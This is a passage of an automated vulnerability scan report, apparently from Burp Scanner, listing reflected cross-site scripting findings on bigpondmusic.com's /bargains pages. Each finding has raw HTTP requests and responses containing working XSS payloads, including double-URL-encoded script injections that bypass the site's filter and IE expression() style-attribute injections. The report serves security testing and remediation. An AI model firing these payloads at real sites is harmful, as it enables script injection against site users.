The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 907ce'%3beb1515a2326 was submitted in the REST URL parameter 2. This input was echoed as 907ce';eb1515a2326 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains/dalbums907ce'%3beb1515a2326 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87793


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
sting.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains';
   s.prop4 = 'dalbums907ce';eb1515a2326';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.166. http://bigpondmusic.com/bargains/dalbums [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/dalbums

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 643e0"style%3d"x%3aexpression(alert(1))"352441b3890 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 643e0"style="x:expression(alert(1))"352441b3890 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/dalbums?643e0"style%3d"x%3aexpression(alert(1))"352441b3890=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:16:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 349065


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Double Albums - BigPond Musi
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/dalbums?643e0"style="x:expression(alert(1))"352441b3890=1" />
...[SNIP]...

2.167. http://bigpondmusic.com/bargains/under11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under11

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 553f9'%3b12846113a16 was submitted in the REST URL parameter 1. This input was echoed as 553f9';12846113a16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains553f9'%3b12846113a16/under11 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87871


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains553f9';12846113a16';
   s.prop4 = 'under11';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.168. http://bigpondmusic.com/bargains/under11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be40b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea55f571f2e8 was submitted in the REST URL parameter 1. This input was echoed as be40b"><script>alert(1)</script>a55f571f2e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargainsbe40b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea55f571f2e8/under11 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87904


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargainsbe40b"><script>alert(1)</script>a55f571f2e8/under11" />
...[SNIP]...

2.169. http://bigpondmusic.com/bargains/under11 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under11

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a0f0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6d2018e8d34 was submitted in the REST URL parameter 2. This input was echoed as 2a0f0"><script>alert(1)</script>6d2018e8d34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains/under112a0f0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6d2018e8d34 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87866


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under112a0f0"><script>alert(1)</script>6d2018e8d34" />
...[SNIP]...

2.170. http://bigpondmusic.com/bargains/under11 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under11

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4a97'%3b192cd7debc4 was submitted in the REST URL parameter 2. This input was echoed as f4a97';192cd7debc4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains/under11f4a97'%3b192cd7debc4 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87733


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
sting.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains';
   s.prop4 = 'under11f4a97';192cd7debc4';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.171. http://bigpondmusic.com/bargains/under11 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under11

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85cfd"style%3d"x%3aexpression(alert(1))"bf04d3f3adc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85cfd"style="x:expression(alert(1))"bf04d3f3adc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/under11?85cfd"style%3d"x%3aexpression(alert(1))"bf04d3f3adc=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:16:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 231489


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Albums $11 and under - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under11?85cfd"style="x:expression(alert(1))"bf04d3f3adc=1" />
...[SNIP]...

2.172. http://bigpondmusic.com/bargains/under13 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 885a4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e316cb794c1e was submitted in the REST URL parameter 1. This input was echoed as 885a4"><script>alert(1)</script>316cb794c1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains885a4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e316cb794c1e/under13 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87834


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains885a4"><script>alert(1)</script>316cb794c1e/under13" />
...[SNIP]...

2.173. http://bigpondmusic.com/bargains/under13 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under13

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32294'%3bec059bf4529 was submitted in the REST URL parameter 1. This input was echoed as 32294';ec059bf4529 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains32294'%3bec059bf4529/under13 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87733


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains32294';ec059bf4529';
   s.prop4 = 'under13';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.174. http://bigpondmusic.com/bargains/under13 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2220%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5e45c0b35f9 was submitted in the REST URL parameter 2. This input was echoed as c2220"><script>alert(1)</script>5e45c0b35f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains/under13c2220%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5e45c0b35f9 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88112


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13c2220"><script>alert(1)</script>5e45c0b35f9" />
...[SNIP]...

2.175. http://bigpondmusic.com/bargains/under13 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under13

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51d00'%3b5edcbbcdac6 was submitted in the REST URL parameter 2. This input was echoed as 51d00';5edcbbcdac6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains/under1351d00'%3b5edcbbcdac6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87802


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
sting.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains';
   s.prop4 = 'under1351d00';5edcbbcdac6';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.176. http://bigpondmusic.com/bargains/under13 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874f6"style%3d"x%3aexpression(alert(1))"4e4f0e24928 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 874f6"style="x:expression(alert(1))"4e4f0e24928 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/under13?874f6"style%3d"x%3aexpression(alert(1))"4e4f0e24928=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
